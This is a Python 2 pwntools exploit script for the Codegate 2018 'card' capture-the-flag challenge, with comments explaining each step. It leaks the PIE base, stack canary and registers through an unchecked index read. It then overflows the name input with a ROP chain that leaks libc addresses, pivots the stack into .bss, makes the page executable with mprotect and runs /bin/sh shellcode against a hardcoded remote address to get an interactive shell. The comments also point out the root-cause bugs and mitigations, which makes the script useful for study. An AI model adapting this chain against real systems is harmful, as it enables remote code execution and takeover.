

Codegate 2018 'card' exploit code

#!/usr/bin/python

from pwn import *
from struct import *

# Python 2 pwntools script (print statements, raw_input, "/" on ints).
# Flow as written below: an index-based read ("x, y") discloses the PIE
# base, a stack address, the stack canary and saved ebx; the "Name :" input
# is then overrun with a ROP chain that prints two GOT entries, stages a
# second payload in .bss and pivots there; that stage calls mprotect(RWX)
# and runs machine code. The two root causes a fix would address are the
# unchecked index on the x,y read and the unbounded Name read.
#
# NOTE: ``p`` is rebound on the next line, so the local ./card process is
# spawned and then abandoned (left running, never closed); only the remote
# service is actually used.
p = process("./card")
p = remote("110.10.147.17",8888)
e = ELF("./card")
# ``l`` is rebound the same way: only /lib32/libc.so.6's symbol offsets are used.
l = ELF("/lib/i386-linux-gnu/libc.so.6")
l = ELF("/lib32/libc.so.6")
raw_input(">>>")  # pause until Enter is pressed (Python 2 API)

# Gadget offsets relative to the PIE base (added to ``base`` further down).
# The names suggest pop;pop;pop;ret, leave;ret and pop ebp;ret — confirm
# against this exact binary build before relying on them.
pppr = 0x1439
leaveret = 0xd3c
pebpret = 0x143b

addr = 0  # unused: leak() shadows it with a local of the same name

def leak(snum):
    """Read one little-endian 32-bit value through the x,y index oracle.

    Four consecutive indices starting at ``snum`` are queried as ``"<idx>,0"``;
    the decimal answer printed after ``"= "`` is taken as byte ``k`` (expected
    to be 0..255) and weighted by ``256**k``. The weighted sum is returned.
    Talks to the module-level connection ``p``.
    """
    value = 0
    for k in range(4):
        p.readuntil("x, y : ")
        p.sendline("{},0".format(snum + k))
        p.readuntil("= ")
        digits = p.readuntil("\n")[:-1]  # drop the trailing newline
        value += int(digits) * (256 ** k)
    return value

# Menu interaction preceding the leak; what "1" and "77777" select is not
# visible in this script — confirm against the binary.
p.sendline("1")
p.sendline("77777")
raw_input(">>>")
# Four 32-bit values are recovered through leak()'s index primitive: the
# program load address (the value at index 668 is taken to be base+0x12f3),
# a stack address, the stack canary and the saved ebx. One out-of-bounds
# read thus defeats PIE/ASLR and the stack protector together — the missing
# bounds check on the index is the defect to fix.
base = leak(668)-0x12f3
stack = leak(664)
canary = leak(652)
ebx = leak(656)
# Value derived from the leaked stack address and the PIE base (+0x3020);
# it is split into tgt%24 and tgt/24 below. Python 2 integer division is
# relied upon: under Python 3, "{}".format(tgt/24) would emit a float.
tgt = (0x100000000-stack+716)+base+0x3020

print hex(stack)
print hex(base)
print hex(canary)
print hex(ebx)
#print hex(tgt)
#print tgt
#print tgt/24
#print tgt%24

# Further x,y inputs. The pairs (648,0)/(0,27), (649,0)/(1,27) and
# (624,0)/(0,26) look like index/value pairs, but their effect is not
# recoverable from this script — confirm against the binary.
p.sendline("{},0".format(tgt))
p.sendline("{},{}".format(tgt%24,tgt/24))
p.sendline("648,0")
p.sendline("0,27")
p.sendline("649,0")
p.sendline("1,27")
p.sendline("624,0")
p.sendline("0,26")
p.readuntil("Name :")
raw_input(">>>")

# First-stage payload for the "Name :" input: 500 bytes of filler reach the
# canary slot (so the Name buffer is overrun by at least that much), the
# leaked canary keeps the stack-protector check passing, then the saved
# registers (ebx restored to its leaked value) and the return address.
dummy = "A"*500

payload = dummy
payload += p32(canary)
payload += "AAAA"+p32(ebx)+"CCCC"

# ROP chain (every address is PIE-base relative):
#   puts(atoi@got)              -> prints atoi's libc address
#   puts(printf@got)            -> prints printf's libc address
#   read(0, __bss_start, 0x2000) -> stages the second payload in .bss
# ``pppr+2`` presumably serves as a single pop;ret to skip one argument,
# ``pppr`` skips read()'s three.
print hex(base+e.plt['puts'])
payload += p32(base + e.plt['puts'])
payload += p32(base + pppr+2)
payload += p32(base + e.got['atoi'])
payload += p32(base + e.plt['puts'])
payload += p32(base + pppr+2)
payload += p32(base + e.got['printf'])

payload += p32(base + e.plt['read'])
payload += p32(base + pppr)
payload += p32(0)
payload += p32(base + e.symbols['__bss_start'])
payload += p32(0x2000)

# Stack pivot: pop ebp <- __bss_start-4, then leave;ret sets esp to
# __bss_start and returns into the first dword of the staged payload.
payload += p32(base + pebpret)
payload += p32(base + e.symbols['__bss_start']-4)
payload += p32(base + leaveret)

# Answer to the prompt before the Name input (purpose not visible here),
# then the overflowing Name value.
p.sendline("314ckC47 Hacked This")
sleep(1)
p.sendline(payload)
print p.readuntil("\n\n")
print p.readuntil("\n\n")

sleep(1)

# Parse the two leaked GOT entries: u32 of the first 4 output bytes, rest of
# the line discarded. NOTE: ``libc_read`` actually holds atoi's address
# (see the chain above) and ``libc_main`` is the libc load base;
# ``libc_printf`` and ``libc_binsh`` are only printed, never used.
libc_read = u32(p.read(4))
p.readuntil("\n")
libc_printf = u32(p.read(4))
libc_main = libc_read-l.symbols['atoi']
libc_mprotect = libc_main + l.symbols['mprotect']
# Hard-coded offset for the author's libc build, not derived from ``l``;
# it would have to be re-checked for any other libc.
libc_binsh = libc_main + 0x15ba0b

sleep(1)

print hex(libc_read)
print hex(libc_printf)
print hex(libc_main)
print hex(libc_mprotect)
print hex(libc_binsh)

# Second stage, written to .bss by the read() above and entered via the
# pivot: mprotect(page_of(__bss_start), 0x1000, 7) with 7 = RWX, returning
# to __bss_start+0x100, which lies inside the 0x100-byte NOP sled that
# follows the five dwords. Turning a writable page executable is how the
# exploit works around NX; W^X enforcement or a seccomp filter denying
# PROT_EXEC in mprotect would stop this step.
payload = ''
payload += p32(libc_mprotect)
payload += p32(0x100+e.symbols['__bss_start']+base)  # return address after mprotect
payload += p32(0xfffff000&(e.symbols['__bss_start']+base))  # page-aligned start
payload += p32(0x1000)  # length
payload += p32(7)  # prot: read|write|exec
payload += "\x90"*0x100
# Author-supplied i386 machine code (the hex embeds the ASCII "//sh" and "/bin").
payload += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"

p.sendline(payload)

p.interactive()